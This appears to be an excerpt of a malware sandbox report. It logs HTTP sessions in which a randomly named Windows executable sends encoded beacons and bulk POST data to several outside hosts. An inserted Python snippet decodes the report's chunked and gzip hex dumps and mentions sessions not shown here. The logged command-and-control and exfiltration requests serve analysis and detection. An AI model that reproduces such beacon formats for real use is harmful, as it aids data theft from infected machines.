Nov 13, 2024 09:27:19.306839943 CET | 424 | IN | Data Raw: (hex dump omitted)
Nov 13, 2024 09:27:19.306874990 CET | 646 | IN | Data Raw: (hex dump omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 58870 | 194.58.112.174 | 80 | 2800 | C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 09:27:21.047791004 CET | 530 | OUT | GET /xprp/?rP=VtQLa3osnF7akoTJd8K7MWrEHzl8DW0FSH4Ha68GLubc/osER9eyiC9/VfKiy/o0cRDnmrVyyY747d0hGVpIr6r2fBWTDvY7eHgrrdp64c4dmhIDxYLLQeM=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
Host: www.marketplacer.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 13, 2024 09:27:21.875041962 CET | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 13 Nov 2024 08:27:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
                                                                                      Data Ascii: 24fc<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.marketplacer.top</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg. [TRUNCATED]
Nov 13, 2024 09:27:21.875113964 CET | 1236 | IN | Data Ascii: v><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.marketplacer.top</h1><p class="b-parking__he
Nov 13, 2024 09:27:21.875152111 CET | 1236 | IN | Data Ascii: .</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_typ
Nov 13, 2024 09:27:21.875186920 CET | 1236 | IN | Data Ascii: ></li></ul><div class="b-parking__button-wrapper"><a class="b-button b-button_color_primary b-button_style_wide b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type_hosting" href="https://www.reg.ru/h
Nov 13, 2024 09:27:21.875224113 CET | 1236 | IN | Data Ascii: edium=parking&utm_campaign=s_land_server&amp;reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__promo-item_type_sitebuilder"><strong class="b-title b-title_size_large-compact">
Nov 13, 2024 09:27:21.875258923 CET | 1236 | IN | Data Ascii: um=parking&utm_campaign=s_land_fssl&reg_source=parking_auto"> SSL</a><p class="b-text b-parking__promo-description l-margin_top-small l-margin_bottom-normal l-margin_top-medium@desktop l-margin_bottom-none@desktop">
Nov 13, 2024 09:27:21.875294924 CET | 1236 | IN | Data Ascii: ].href = links[ i ].href + '?'; } links[ i ].href = links[ i ].href + 'rid=' + data.ref_id; } } } var script = document.createElement('script'); var
Nov 13, 2024 09:27:21.875435114 CET | 979 | IN | Data Ascii: spans[ i ][ t ] = text; } else if ( spans[ i ].className.match( /^no-puny/ ) ) { spans[ i ].style.display = 'none'; } } }</script>... Yandex.Metrika counter --><script type="


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 58902 | 3.33.130.190 | 80 | 2800 | C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 09:27:27.064198017 CET | 795 | OUT | POST /k47i/ HTTP/1.1
Host: www.energyparks.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://www.energyparks.net
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 199
Referer: http://www.energyparks.net/k47i/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Ascii: rP=wmZkboj32hLN1ojlZRseferPnVqeXyBFe9akuyk+aG5+sZ4D9Pmzjg7I/z1wBk0IzqF7RXGkxLpJhtiVm4Z9VcphwQdFvwtP9DZN+9sUqYk2uhF5bTvS5VdfpQpzAVRvQvx+sBelvSdOxZU5t//Dd2DF4wjLKXLwFq1gWZ0yOwsCazoTVReUyWRjGOgp3ggdFQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 58917 | 3.33.130.190 | 80 | 2800 | C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 09:27:29.627119064 CET | 815 | OUT | POST /k47i/ HTTP/1.1
Host: www.energyparks.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://www.energyparks.net
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 219
Referer: http://www.energyparks.net/k47i/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Ascii: rP=wmZkboj32hLN2JTleC0ee+rMiVqecSBBe9Gku3EuZ0d+s8ED8Lyz2g7InD11PE09zqBZRTGkxLtJhsSVlPNyVMpjpgdHwAtP9DZN+5EyqbU2pRV5ZxXRw1dc+gpzXFRrQvxQsE+PvUZOxYk5srLAW2DH8wi0bXKjKY4cZrdUJD41WVlJEg/DgW1QbJpd6jdUefYf4vvR7c7wMUGn953L+S0=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 58932 | 3.33.130.190 | 80 | 2800 | C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 09:27:32.175096989 CET | 10897 | OUT | POST /k47i/ HTTP/1.1
Host: www.energyparks.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://www.energyparks.net
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 10299
Referer: http://www.energyparks.net/k47i/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 58948 | 3.33.130.190 | 80 | 2800 | C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 09:27:34.721456051 CET | 529 | OUT | GET /k47i/?rP=9kxEYcPO0Qe31MjAFnEMVPHcjnW8clhJfOSVnSYcFCRu8P8I16bnpHX0uCpjJCIKhM8RXi76z74nz8CD3eQ5QOBn4QFToSxFkTdn7+Zz8rczuwwOORjeo18=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
Host: www.energyparks.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 13, 2024 09:27:35.341252089 CET | 398 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Wed, 13 Nov 2024 08:27:35 GMT
Content-Type: text/html
Content-Length: 258
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?rP=9kxEYcPO0Qe31MjAFnEMVPHcjnW8clhJfOSVnSYcFCRu8P8I16bnpHX0uCpjJCIKhM8RXi76z74nz8CD3eQ5QOBn4QFToSxFkTdn7+Zz8rczuwwOORjeo18=&2p2h=vzYT2lDhJTZ0Ql"}</script></head></html>


Session ID: 13 | Source IP: 192.168.2.4 | Source Port: 58983 | Destination IP: 104.21.14.183 | Destination Port: 80 | PID: 2800 | Process: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe

Timestamp: Nov 13, 2024 09:27:41.032186985 CET | Bytes transferred: 777 | Direction: OUT | Data:
POST /9jdk/ HTTP/1.1
Host: www.yvrkp.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://www.yvrkp.top
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 199
Referer: http://www.yvrkp.top/9jdk/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Data Ascii: rP=bszTw8BK2bGMUJJ4wnXzkHlBhu+RSx05CgKV15NF18DruOWD+gPIHi+VRafRxTEWs6WtYwdsVprfRcjxocM0c1w7VtbYPOWLedjTw8CslPpbOX2ExjABiRX9/oYVbzy5XBeEu++7Xzc/+WL/vvgHDGhHKJSgTpqt8krHWuLLOSG80hccd5i8UNckTuVjkdUGyQ==
Timestamp: Nov 13, 2024 09:27:42.064431906 CET | Bytes transferred: 1236 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 08:27:41 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Cache-Control: private
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Frame-Options: SAMEORIGIN
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type, needToken,method, Authorization
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1RYy4foJM%2BQnLI3%2F6Rx%2BzgVVissFfgMbOGmNQGJ%2FxpMtCEkNRniJKQEpbKBjeG1GOil0uokiP6E6ljNoyCCaIz%2B8HYIQjnH3DV1TKqmIvxKmBI5%2FRaZsGCNHsujmNj2m"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1d62508a592d3b-DFW
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1407&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=777&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID: 14 | Source IP: 192.168.2.4 | Source Port: 58999 | Destination IP: 104.21.14.183 | Destination Port: 80 | PID: 2800 | Process: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe

Timestamp: Nov 13, 2024 09:27:43.567522049 CET | Bytes transferred: 797 | Direction: OUT | Data:
POST /9jdk/ HTTP/1.1
Host: www.yvrkp.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://www.yvrkp.top
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 219
Referer: http://www.yvrkp.top/9jdk/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Data Ascii: rP=bszTw8BK2bGMUp541ADzz3lAqO+RZR09CgGV180C1vnruumD/ljICi+Ve6fU8zEZs6bHY0dsVpPfRerxotM1N1w5dNbaLOWLedjTw8GKlPhbS2GEwB4GhRXyr4YVKjy9XBfnu/TUX1Q/+UD/vb8GJGhBOJT+bb3flGKXJMnpPhi+1nRGMIDrGN4XOpcXpepPpdjdbk/WnP9oClUShOq4yI4=
Timestamp: Nov 13, 2024 09:27:44.597100019 CET | Bytes transferred: 1236 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 08:27:44 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Cache-Control: private
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Frame-Options: SAMEORIGIN
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type, needToken,method, Authorization
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JfWjV8s5g%2B7cHRVRAEjk%2FBEYFbUYckCjtaB6jFGgogQeFAU52%2FFyJhoqDpvH7xF%2FmmlfvgNChcivvM0Jj%2FVWCd2p%2Ffyzr9ofOB2uj49UDLcIDsaU4BwCTwCwFDgAP7MZ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1d62607ad5467e-DFW
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1179&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=797&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID: 15 | Source IP: 192.168.2.4 | Source Port: 59009 | Destination IP: 104.21.14.183 | Destination Port: 80 | PID: 2800 | Process: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe

Timestamp: Nov 13, 2024 09:27:46.113253117 CET | Bytes transferred: 10879 | Direction: OUT | Data:
POST /9jdk/ HTTP/1.1
Host: www.yvrkp.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://www.yvrkp.top
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 10299
Referer: http://www.yvrkp.top/9jdk/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Timestamp: Nov 13, 2024 09:27:47.160398960 CET | Bytes transferred: 1010 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 08:27:47 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Cache-Control: private
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Frame-Options: SAMEORIGIN
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type, needToken,method, Authorization
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5QUagc1ARxq%2BvBhqdi3RVUZyUrKzPVsdSVzsrfvgVuyt%2BSGV46SaaiVYzB%2FozHQKRQalQSSAqqd2L43xV1Hiifd6deNC4zgnfdXNKHbsJoQQ%2BSnKZnQXfs%2BfJ4YUlpvu"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1d62706ee98787-DFW
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1235&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10879&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                                      Data Ascii: f
                                                                                      Nov 13, 2024 09:27:47.160418034 CET1236INData Raw: 35 37 31 0d 0a c4 58 4d 6f db 46 10 3d db 80 ff c3 86 41 91 04 e8 8a b2 1c 37 09 23 19 4d 1d bb 4d 3f f2 81 d8 45 7b 32 46 e4 48 5c 6b b9 cb ec 2e 29 cb 41 80 1e 0b 14 3d e4 92 a2 40 7a 68 0f 3d f5 da 5b d1 7f 13 03 f9 17 c5 92 94 bc 94 28 db 45
                                                                                      Data Ascii: 571XMoF=A7#MM?E{2FH\k.)A=@zh=[(EV%rwHlWrjj%`Z[]R|mKaP7I#a%aJEo=-sN!@uXjt/d,U3RgE&E
                                                                                      Nov 13, 2024 09:27:47.160509109 CET164INData Raw: 21 45 81 56 df be 01 d9 b0 5b b0 71 11 4d 29 bb c0 ea ec 89 e0 6d bd fd fd d5 db 5f ff 6c 4e bb 0f b5 dc d5 b4 3f 33 27 e7 c8 6a b3 41 58 d4 bb 36 6b 3f 45 15 5e 7b df 19 f2 1a 75 2f 82 c8 f4 ff 20 fd 4f af 4f 5e fd 75 f2 fd cb 37 df bd 5c 92 80
                                                                                      Data Ascii: !EV[qM)m_lN?3'jAX6k?E^{u/ OO^u7\&c4^[]YY]lNO'e+P$?_8
                                                                                      Nov 13, 2024 09:27:47.350872993 CET1236INData Raw: 36 62 33 0d 0a dc 5b 5b 53 13 49 14 7e b7 ca ff 30 15 d7 1b bb c3 74 f7 dc 83 9b 97 7d d8 a7 dd 27 f6 c9 b2 52 93 b9 2c d1 40 52 b9 58 f8 60 15 17 6b 15 29 17 56 91 4b 40 a9 90 a0 58 18 44 50 11 e4 f2 67 9c 4b 9e f6 2f 6c cd a5 27 33 21 2a 12 31
                                                                                      Data Ascii: 6b3[[SI~0t}'R,@RX`k)VK@XDPgK/l'3!*1ds;;CC1u`VVw,6Q:}X9f!nV-5_JuR3I\QL6We9QXhh*i*kh(j&h@c&i;L<.kqgx<
                                                                                      Nov 13, 2024 09:27:47.350899935 CET  486 bytes  IN  Data Raw: 6a ab b3 e6 ce 73 e3 ce 62 ed f1 81 55 9e 33 d6 a7 ac 37 2b c6 ec be 39 fb cc 6e 5c 9d ec 48 1b 13 11 dd 26 1b 43 d8 c6 10 64 00 64 39 04 45 a1 25 64 f5 07 a5 da 50 d1 fc eb b5 b1 fe c6 5a 1a ef 48 4b 13 85 b6 58 5a 83 cf e3 19 16 32 0c dd a2 cf
                                                                                      Data Ascii: jsbU37+9n\H&Cdd9E%dPZHKXZ23v~3@WAp* ~!j"V<fvh, S3Vgnl<yA2Ny lKpwdg(Su>,9V2Y(
                                                                                      Nov 13, 2024 09:27:47.540983915 CET  1236 bytes  IN  Data Raw: 62 32 30 0d 0a ec 5d 5b 4f 1b 49 16 7e 9e 91 e6 3f d4 f4 cc c6 b6 12 5f f0 05 b0 03 96 32 1b 45 3b da 79 58 29 0f fb 10 45 a3 06 37 76 6f 1a b7 e5 6e 43 c8 45 22 84 8b 21 10 20 40 ec 70 09 21 21 0c b9 13 87 31 04 3b 20 ed 5f 19 57 5f 9e f8 0b ab
                                                                                      Data Ascii: b20][OI~?_2E;yX)E7vonCE"! @p!!1; _W_DKDqSNsw 0R.[0?*Y98cwR#I2@#^{k&^kF\zn99t:AJ<e(5HLR*%tiG8J
                                                                                      Nov 13, 2024 09:27:47.541006088 CET  212 bytes  IN  Data Raw: 1e 5a 00 c1 b1 19 40 5f 0d 2a 64 9c 34 08 da 61 09 9a 00 c3 4c 18 60 16 8d 75 ad da da da 2c 39 a3 76 47 a1 e4 78 be 0e b1 8a e8 e3 ed 65 af 79 bb d8 ab 48 2d 05 f3 ca 88 af 37 37 ce 9f 11 18 ed 62 05 14 33 29 a5 9c a5 db c3 91 c5 c0 0f 54 04 fd
                                                                                      Data Ascii: Z@_*d4aL`u,9vGxeyH-77b3)T535`zrkR&Yl4={tS8_H9Dcnf9K)owf q5;s~Zy[}&hHl1VP(dD0!"?&d
                                                                                      Nov 13, 2024 09:27:47.541022062 CET  1236 bytes  IN  Data Raw: 9d 67 b9 8b 0d 8a 8a f3 44 0c e4 b2 8c db c1 af 42 45 53 f2 22 1e 84 b2 e0 b1 97 93 a5 32 14 a9 00 37 6a 97 f6 64 5a 43 a3 50 7a cc 5c 4d d1 b4 f8 5c ac ce 49 e1 06 67 1a 9c 46 1f 39 0d 22 7c ce 08 64 ae 3a f8 8e 11 5d b9 01 2f c3 26 d9 a3 02 a3
                                                                                      Data Ascii: gDBES"27jdZCPz\M\IgF9"|d:]/&PkKRV"Ci@KRi.VeNG&A;TontCTA ,r:#/QrzgzLM$sq46P_:-A}5h_@
                                                                                      Nov 13, 2024 09:27:47.541038990 CET  193 bytes  IN  Data Raw: 11 20 c8 c0 9f 14 c4 40 44 e4 8c 24 88 f3 d4 41 e4 89 86 a4 1c 97 fa bb 0e 90 64 d2 84 53 9b 9e 08 f8 82 1c ce a1 6d 4e 88 f6 40 5f 3f 7e 3f 4b 71 19 36 cd d1 7d d4 bf 11 05 17 03 97 ac 33 a7 82 73 95 61 69 94 17 d1 8a e0 d9 71 01 b8 f0 20 7a 12
                                                                                      Data Ascii: @D$AdSmN@_?~?Kq6}3saiq zC`ZTzakY\G'OWxIY}%"Zz$C]<GAUpYc-S9k0
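The "Data Ascii" rendering of the response above is meaningless because the body is sent with Transfer-Encoding: chunked and gzip-compressed: the first chunk is the 15-byte chunk "f" carrying the gzip magic 1f 8b, followed by an empty stored deflate block, and the real content only starts in the 0x571-byte chunk that follows. The Python below is an editor's added example, not part of the Joe Sandbox report. It converts the report's "Data Raw" hex into bytes, strips the chunked framing, and inflates whatever part of the gzip stream the dump actually contains, reporting when the stream is cut off. The hex inputs are copied from this report (the first two chunk headers of this response and the opening bytes of the 404 page that www.flikka.site returns in the later sessions); the function names and the handling of truncated dumps are the editor's own.

```python
"""Decode the report's 'Data Raw' hex dumps and unwrap chunked/gzip bodies.

Added example, not part of the Joe Sandbox report. The hex strings are copied
from the report; function names and truncation handling are the editor's own.
"""
import re
import zlib

# Chunk 'f' (15 bytes) of the gzip'd response: gzip header + an empty stored deflate block.
FIRST_CHUNK_DUMP = "66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a"
# Start of the next 'Data Raw' line: chunk size '571' (0x571 = 1393 bytes), body cut off by the dump.
NEXT_CHUNK_DUMP = "35 37 31 0d 0a"
# Opening bytes of the uncompressed 404 body from www.flikka.site (Content-Length framed, not chunked).
HTML_404_DUMP = (
    "3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 "
    "2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 "
    "61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 "
    "79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 "
    "65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e "
    "6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a")


def hexdump_to_bytes(dump):
    """Space-separated hex from a 'Data Raw:' line to bytes.

    Only two-character hex tokens are taken, so a leading 'Data Raw:' label
    or a trailing '[TRUNCATED]' marker can be left in the input.
    """
    return bytes.fromhex("".join(re.findall(r"\b[0-9a-fA-F]{2}\b", dump)))


def unchunk(data):
    """Strip HTTP/1.1 chunked framing.

    Returns (payload, complete, chunk_sizes). complete is False when the data
    ends before the terminating zero-length chunk or inside a chunk, which is
    the normal case for a sandbox dump that shows only the first bytes.
    """
    payload, sizes, pos = bytearray(), [], 0
    while True:
        end = data.find(b"\r\n", pos)
        if end < 0:
            return bytes(payload), False, sizes
        size_field = data[pos:end].split(b";", 1)[0].strip()   # drop chunk extensions
        if not size_field:
            return bytes(payload), False, sizes
        size = int(size_field, 16)
        sizes.append(size)
        if size == 0:
            return bytes(payload), True, sizes
        body = data[end + 2:end + 2 + size]
        payload += body
        if len(body) < size:
            return bytes(payload), False, sizes   # chunk cut off by the dump
        pos = end + 2 + size + 2                  # skip the chunk's trailing CRLF


def inflate_partial(payload):
    """Inflate whatever gzip data is present. Returns (text, is_gzip, stream_ended)."""
    if payload[:2] != b"\x1f\x8b":
        return payload.decode("utf-8", "replace"), False, True
    d = zlib.decompressobj(16 + zlib.MAX_WBITS)     # +16: expect a gzip header
    out = d.decompress(payload)                     # returns what it can; no error on short input
    return out.decode("utf-8", "replace"), True, d.eof


def decode_dump_line(dump, chunked=True):
    """hex -> bytes -> (optionally) unchunk -> inflate, with framing status."""
    raw = hexdump_to_bytes(dump)
    if chunked:
        raw, complete, sizes = unchunk(raw)
    else:
        complete, sizes = True, []
    text, is_gzip, ended = inflate_partial(raw)
    return {"text": text, "gzip": is_gzip, "stream_ended": ended,
            "chunks_complete": complete, "chunk_sizes": sizes}


if __name__ == "__main__":
    print(decode_dump_line(FIRST_CHUNK_DUMP))
    print(decode_dump_line(NEXT_CHUNK_DUMP))
    print(decode_dump_line(HTML_404_DUMP, chunked=False)["text"])
```

For the first chunk the result is gzip=True, text empty and stream_ended=False: the five bytes after the ten-byte gzip header (00 00 00 ff ff) are an empty stored deflate block, so there is nothing to recover from it, and because every "Data Raw" line in the report stops after the first hundred-odd bytes the inflater will never see the end of the stream. To read the page that www.yvrkp.top actually served you need the full capture, not the report's dump.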


                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                      16          192.168.2.4  59023        104.21.14.183   80                2800  C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      Timestamp                            Bytes transferred  Direction  Data
                                                                                      Nov 13, 2024 09:27:48.656856060 CET  523 bytes  OUT  GET /9jdk/?rP=WubzzLgyg7H8FuUk5n/moB8/gOqFZhsVZD6HlZkF1Lv4/cTJ30fLKlagebv44Go8+oe4d1owWbTtJNvV0eU1JmU5XMaUHO6aCszk2dDtn8pHKEGonxM30wY=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
                                                                                      Host: www.yvrkp.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Nov 13, 2024 09:27:50.170633078 CET  1236 bytes  IN  HTTP/1.1 200 OK
                                                                                      Date: Wed, 13 Nov 2024 08:27:49 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Cache-Control: private
                                                                                      X-AspNet-Version: 4.0.30319
                                                                                      X-Powered-By: ASP.NET
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Headers: Content-Type, needToken,method, Authorization
                                                                                      cf-cache-status: DYNAMIC
